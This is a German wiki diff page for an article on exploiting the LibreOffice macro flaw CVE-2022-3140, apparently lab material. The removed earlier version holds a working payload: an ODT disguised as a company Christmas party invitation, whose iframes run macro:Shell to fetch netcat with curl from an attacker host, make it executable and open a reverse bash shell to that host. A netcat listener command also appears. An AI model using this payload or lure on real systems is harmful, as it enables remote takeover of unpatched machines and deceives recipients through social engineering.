LibreOffice Makrolücke Hack (CVE-2022-3140): Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(2 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
 
=Vorbereitung=
 
=Vorbereitung=
 
;Vorausetzung
 
;Vorausetzung
*Libre Office version vor 7.3.6
+
*Libre Office version 7.3 bis 7.3.5
 
;Alte Pakete
 
;Alte Pakete
 
*https://downloadarchive.documentfoundation.org/libreoffice/old/
 
*https://downloadarchive.documentfoundation.org/libreoffice/old/
 
=Angreifer=
 
=Angreifer=
 
*netcat -lp 1234
 
*netcat -lp 1234
 
 
=ODT erstellen=
 
=ODT erstellen=
*cat weihnachtsfeier.odt
+
*[[LibreOffice Makrolücke Linux Backdoor]]
;Als embedded HTML
+
*[[LibreOffice Makrolücke Linux Open Site]]
<pre>
+
*[[LibreOffice Makrolücke Windows Open Site]]
<HTML>
 
<MAIN>
 
Liebes Team,</br>
 
 
 
die Müller GmbH lädt Sie herzlich zur Weihnachtsfeier am 27. November im Restaurant Bella Italia ein! </br>
 
Anschließend möchten wir den Abend in der Weinbar am Marktplatz ausklingen lassen.</br>
 
Treffpunkt ist um 17:30 Uhr vor dem Restaurant.</br>
 
</br>
 
</br>
 
Bitte geben Sie uns bis zum 27. November Bescheid, ob wir mit Ihrem Kommen rechnen können.</br>
 
</br>
 
Wir freuen uns auf Sie!</br>
 
</br>
 
Ihre Geschäftsführung</br>
 
 
 
</br>
 
 
 
<img src="http://10.0.10.101/weihnachtsmann.jpg" "height="100" width="200">
 
 
 
</br>
 
<iframe src='macro:Shell("curl" , 0 ,"http://10.0.10.101/nc -o /tmp/nc",True)'></iframe>
 
</br>
 
<iframe src='macro:Shell("chmod", 0, "755 /tmp/nc" , True )'></iframe>
 
</br>
 
<iframe src='macro:Shell("/tmp/nc", 0, "-e /bin/bash 10.0.10.101 1234", True)'></iframe>
 
</MAIN>
 
</HTML>
 
</pre>
 

Aktuelle Version vom 29. August 2024, 14:11 Uhr

Vorbereitung

Vorausetzung
  • Libre Office version 7.3 bis 7.3.5
Alte Pakete

Angreifer

  • netcat -lp 1234

ODT erstellen

Abgerufen von „http://wiki.ixheim.de/index.php?title=LibreOffice_Makrolücke_Hack_(CVE-2022-3140)&oldid=55959